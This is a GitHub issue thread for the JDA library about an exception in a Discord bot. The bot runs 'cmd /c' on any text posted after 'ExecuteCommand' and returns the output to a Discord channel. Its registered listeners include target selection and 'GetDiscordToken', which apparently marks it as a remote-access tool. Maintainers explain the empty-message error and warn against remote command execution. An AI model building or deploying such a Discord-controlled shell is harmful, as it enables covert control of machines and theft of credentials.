### ISSUE TITLE
Eventlisteners uncaught exception

### ISSUE THREAD

**Issue by GameboyVlol** [DV8FromTheWorld/JDA#2430]
### General Troubleshooting

- [X] I have checked for similar issues on the Issue-tracker.
- [X] I have updated to the [latest JDA version](https://ci.dv8tion.net/job/JDA/lastSuccessfulBuild/)
- [X] I have checked the branches or the maintainers' PRs for upcoming bug fixes.

### Expected Behaviour

execute a command on my pc through a discord bot

### Code Example for Reproduction Steps

```java
package org.example.commands;

import net.dv8tion.jda.api.hooks.ListenerAdapter;
import net.dv8tion.jda.api.events.message.MessageReceivedEvent;

import java.io.IOException;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.Objects;

import static org.example.Discord4Shell.Discord4Shell.user;
import static org.example.commands.SelectTargetMessage.SelectedTarget;
import java.io.BufferedReader;

public class ExecuteCommandMessage extends ListenerAdapter {

    public static String Message = null;
    public static ArrayList<String> message = new ArrayList<>();
    public void onMessageReceived(MessageReceivedEvent event) {
        if (event.getAuthor().isBot()) {
            return;
        }

        if (event.getMessage().getContentRaw().contains("ExecuteCommand")) {
            String[] args = event.getMessage().getContentRaw().split(" ");
            int index = 1;
            while (index < args.length) {
                message.add(args[index]);
                index++;
            }
            Message = String.join(" ", message);
            message.clear();
            System.out.println(Message);

            if (Objects.equals(SelectedTarget, user)) {
                try {
                    Process process = Runtime.getRuntime().exec("cmd /c " + Message);
                    BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
                    BufferedReader error = new BufferedReader(new InputStreamReader(process.getErrorStream()));
                    String line;
                    while ((line = reader.readLine()) != null) {
                        event.getChannel().sendMessage(line).queue();
                        System.out.println(process);
                    }
                    while ((line = error.readLine()) != null) {
                        event.getChannel().sendMessage(line).queue();
                    }
                    reader.close();
                    error.close();
                } catch (IOException e) {
                    event.getChannel().sendMessage("Error: " + e).queue();
                }
            }
        }
    }
}
```

### Code for JDABuilder or DefaultShardManagerBuilder used

```java
package org.example.Discord4Shell;

import net.dv8tion.jda.api.JDA;
import net.dv8tion.jda.api.JDABuilder;
import net.dv8tion.jda.api.entities.Activity;
import net.dv8tion.jda.api.entities.Guild;
import net.dv8tion.jda.api.entities.channel.attribute.IGuildChannelContainer;
import net.dv8tion.jda.api.events.session.ReadyEvent;
import net.dv8tion.jda.api.requests.GatewayIntent;
import okhttp3.internal.ws.RealWebSocket;
import org.example.commands.*;
import java.util.Objects;



public class Discord4Shell {
    public static JDA bot;
    public static String user = System.getProperty("user.name");
    public static void main(String[] args) {
        bot = JDABuilder.createDefault("TOKEN")
                .setActivity(Activity.playing("No Larry?"))
                .enableIntents(GatewayIntent.MESSAGE_CONTENT)
                .build();


        bot.addEventListener(new TargetsListMessage());
        bot.addEventListener(new SelectTargetMessage());
        bot.addEventListener(new MessageTargetMessage());
        bot.addEventListener(new GetDiscordTokenMessage());
        bot.addEventListener(new GetHostMessage());
        bot.addEventListener(new WhoAmIMessage());
        bot.addEventListener(new ExecuteCommandMessage());
        bot.addEventListener(new ReadyMessage());


    }
}
```

### Exception or Error

```yesyes
[JDA MainWS-ReadThread] ERROR JDA - One of the EventListeners had an uncaught exception
java.lang.IllegalStateException: Cannot build empty messages! Must provide at least one of: content, embed, file, or stickers
	at net.dv8tion.jda.internal.requests.restaction.MessageCreateActionImpl.finalizeData(MessageCreateActionImpl.java:80)
	at net.dv8tion.jda.internal.requests.RestActionImpl.queue(RestActionImpl.java:193)
	at net.dv8tion.jda.api.requests.RestAction.queue(RestAction.java:572)
	at net.dv8tion.jda.api.requests.RestAction.queue(RestAction.java:538)
	at org.example.commands.ExecuteCommandMessage.onMessageReceived(ExecuteCommandMessage.java:42)
	at net.dv8tion.jda.api.hooks.ListenerAdapter.onEvent(ListenerAdapter.java:424)
	at net.dv8tion.jda.api.hooks.InterfacedEventManager.handle(InterfacedEventManager.java:96)
	at net.dv8tion.jda.internal.hooks.EventManagerProxy.handleInternally(EventManagerProxy.java:88)
	at net.dv8tion.jda.internal.hooks.EventManagerProxy.handle(EventManagerProxy.java:70)
	at net.dv8tion.jda.internal.JDAImpl.handleEvent(JDAImpl.java:171)
	at net.dv8tion.jda.internal.handle.MessageCreateHandler.handleInternally(MessageCreateHandler.java:136)
	at net.dv8tion.jda.internal.handle.SocketHandler.handle(SocketHandler.java:39)
	at net.dv8tion.jda.internal.requests.WebSocketClient.onDispatch(WebSocketClient.java:984)
	at net.dv8tion.jda.internal.requests.WebSocketClient.onEvent(WebSocketClient.java:870)
	at net.dv8tion.jda.internal.requests.WebSocketClient.handleEvent(WebSocketClient.java:848)
	at net.dv8tion.jda.internal.requests.WebSocketClient.onBinaryMessage(WebSocketClient.java:1023)
	at com.neovisionaries.ws.client.ListenerManager.callOnBinaryMessage(ListenerManager.java:385)
	at com.neovisionaries.ws.client.ReadingThread.callOnBinaryMessage(ReadingThread.java:276)
	at com.neovisionaries.ws.client.ReadingThread.handleBinaryFrame(ReadingThread.java:996)
	at com.neovisionaries.ws.client.ReadingThread.handleFrame(ReadingThread.java:755)
	at com.neovisionaries.ws.client.ReadingThread.main(ReadingThread.java:108)
	at com.neovisionaries.ws.client.ReadingThread.runMain(ReadingThread.java:64)
	at com.neovisionaries.ws.client.WebSocketThread.run(WebSocketThread.java:45)
```

**Comment by MinnDevelopment** [comment]
You're trying to send empty messages. This is not allowed and thus you get an exception telling you exactly this. Your subprocess most likely emits empty lines (or only whitespace).

Side note, I'd recommend not letting users run random commands on your machine.

**Comment by GameboyVlol** [comment]
its not really empty and it works with other commands, also its just me running command from my phone on a private server

**Comment by GameboyVlol** [comment]
do you know how to fix it?

**Comment by Andre601** [comment]
Without the actual code you used can we only guess here.

**Comment by Xirado** [comment]
> also why did you close the issue?

Because this is user error and not a JDA Bug. Ask in [the JDA Guild](https://discord.gg/jda).
